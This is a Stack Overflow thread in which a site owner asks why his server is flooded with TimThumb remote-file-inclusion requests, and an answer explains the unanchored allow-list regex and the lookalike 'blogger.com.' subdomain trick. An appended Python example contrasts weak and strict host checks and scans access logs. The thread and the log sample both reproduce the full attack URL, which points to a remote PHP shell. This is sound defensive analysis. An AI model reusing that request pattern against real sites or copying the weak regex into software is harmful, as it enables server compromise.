My server (mediaquarter.at) is currently being DDoSed by requests like this (with some minor variations): hXXp://www.mediaquarter.at/http://www.madeineurope.org.uk/media/functions/timthumb/timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php (URL "deactivated" so no one can accidentally click it)

Beware if you try to download the referenced PHP file: in the preg_replace the /e switch is activated and the code contains multiple eval statements - clean that up before you take a look at it! Looks like pBot; you can find more information about it here: http://www.offensivecomputing.net/?q=node/1417

TimThumb is vulnerable to remote file inclusion (http://eromang.zataz.com/2011/09/20/wordpress-timthumb-rfi-vulnerability-used-as-botnet-recruitment-vector/) - seems to be pretty widespread in WordPress. So I would understand somebody calling hXXp://www.madeineurope.org.uk/media/functions/timthumb/timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php to exploit the vulnerability.

However, what's the point of trying to call it via another website (mediaquarter.at), which only results in a 404 error message? Additionally, my server isn't running WordPress but SilverStripe instead, so this seems to be pretty pointless.

Is this just an error / stupid on the attacker's side or am I overlooking some kind of attack vector here?

PS: The server is just some cheap web hosting and I can't reach it at all, so I'm not able to verify if there are any changes on the system.

xeraa
  • Isn't serverfault a better place to ask this question? – Lukman Dec 14 '11 at 01:14
  • I'm primarily interested in why you'd call the RFI via another host, which isn't affected by the vulnerability. So I thought this would rather fit into the programming part than the sys admin one... – xeraa Dec 14 '11 at 01:27
  • Wow, you have answered your own question in its entirety. Why did you post? – rook Dec 14 '11 at 02:27
  • My main question is the RFI via another host - to me this sounds pointless / doesn't seem to work. But I'm not sure if that's really true or if I'm overlooking something - so I'm asking the wise crowd of SO :-) – xeraa Dec 14 '11 at 02:30
  • http://s.tk/security is a good place for these kind of questions – Cheekysoft Dec 14 '11 at 12:55

1 Answer

If you don't have the timthumb.php file then you're not vulnerable, plain and simple. This is a very exotic vulnerability that I have studied in depth because (so far) it's one of a kind. You should read the exploits written from the attacker's point of view.

In short, it's caching images from "trusted" websites like youtube.com and blogger.com. However, this regular expression is poorly written and isn't bound to the end of the string. It's trivial to change your subdomain to fool this regex check. This is why the attacker's domain name is blogger.com.midislandrental.com.

The reason why you are getting DDoS'ed is probably because the fetch for timthumb.php isn't returning a 404, or the massive botnet that is spreading via timthumb.php is incorrectly fingerprinting you as being vulnerable. You could be showing up in a Google dork for bots trying to find vulnerable hosts.

rook
  • I did get the part about the fake image in combination with the subdomain trick. However, I didn't think about the bot part - thanks for pointing that out! So I'd suspect some script kiddie wrote a crappy script to exploit the WordPress vulnerability. Instead of trying out loads of URLs, it concatenated my (non-vulnerable) URL with a potential target and tried that over and over - resulting in a DDoS... – xeraa Dec 14 '11 at 03:51
  • @xeraa Bot nets like this are the product of organized crime. There are people that camp sites like http://www.exploit-db.com/ and exploit systems in mass for profit. Also, sorry for such a dick post. – rook Dec 14 '11 at 07:20
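The subdomain trick the answer describes, as an added example that is not part of the original question, answer, or TimThumb itself. The weak check is written in the spirit of what rook explains (an allow-list regex that only matches the start of the host) and is not TimThumb's actual code; the allow-list, the hardened parser-based check, and the two sample access-log lines are constructed for this example, with the request and src URLs taken from the question.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, urlsplit

# Hypothetical allow-list of "trusted" image hosts, in the style of TimThumb's
# list (constructed for this example, not the real list).
ALLOWED_SITES: List[str] = [
    "blogger.com",
    "img.youtube.com",
    "flickr.com",
    "upload.wikimedia.org",
]

# Weak check: an allowed host must appear right after the scheme, but nothing
# requires it to be the END of the host part, so "blogger.com.<anything>" and
# "blogger.com@<anything>" both pass. This mirrors the flaw rook describes.
_WEAK_RE = re.compile(
    r"^https?://(?:www\.)?(?:" + "|".join(re.escape(s) for s in ALLOWED_SITES) + r")",
    re.IGNORECASE,
)


def weak_is_allowed(src: str) -> bool:
    """Regex allow-list check that is not anchored to the end of the host."""
    return _WEAK_RE.search(src) is not None


def strict_is_allowed(src: str) -> bool:
    """Hardened check: let the URL parser find the real host name (userinfo,
    port and path are stripped for us), then require an exact match or a
    genuine subdomain of an allowed host."""
    parts = urlsplit(src)
    if parts.scheme.lower() not in ("http", "https"):
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False
    return any(host == s.lower() or host.endswith("." + s.lower()) for s in ALLOWED_SITES)


# Constructed access-log lines. The first carries the request from the
# question (the full target URL embedded in the path, then the src= payload);
# the second is ordinary traffic that should not be flagged.
SAMPLE_LOG_LINES: List[str] = [
    '203.0.113.7 - - [14/Dec/2011:01:10:22 +0100] "GET /http://www.madeineurope.org.uk'
    '/media/functions/timthumb/timthumb.php?src=http://blogger.com.midislandrental.com'
    '/.mods/sh.php HTTP/1.1" 404 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [14/Dec/2011:01:10:23 +0100] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

_REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def timthumb_src(request_target: str) -> Optional[str]:
    """Return the src= value of a timthumb.php request target, or None.
    urlsplit() still isolates the query string even when a whole URL is
    stuffed into the path, as in the question's requests."""
    if "timthumb.php" not in request_target.lower():
        return None
    for key, value in parse_qsl(urlsplit(request_target).query, keep_blank_values=True):
        if key == "src":
            return value
    return None


def classify_log_line(line: str) -> Optional[Dict[str, object]]:
    """For a timthumb.php request, report the src host and what each
    allow-list check would say about it; None for anything else."""
    m = _REQ_RE.search(line)
    if not m:
        return None
    src = timthumb_src(m.group(1))
    if src is None:
        return None
    return {
        "src": src,
        "host": (urlsplit(src).hostname or "").lower(),
        "weak_allows": weak_is_allowed(src),
        "strict_allows": strict_is_allowed(src),
    }


def suspicious_requests(lines: List[str]) -> List[Dict[str, object]]:
    """Requests whose src would slip past the weak check but not the strict one:
    exactly the lookalike-subdomain pattern seen in the question."""
    hits = []
    for line in lines:
        r = classify_log_line(line)
        if r and r["weak_allows"] and not r["strict_allows"]:
            hits.append(r)
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG_LINES):
        print(f"lookalike host {hit['host']!r} in src={hit['src']}")
```

The scan is only a triage aid for the access log on the receiving side; as the answer says, a host without timthumb.php is not exploitable by these requests, it is just being hit by them.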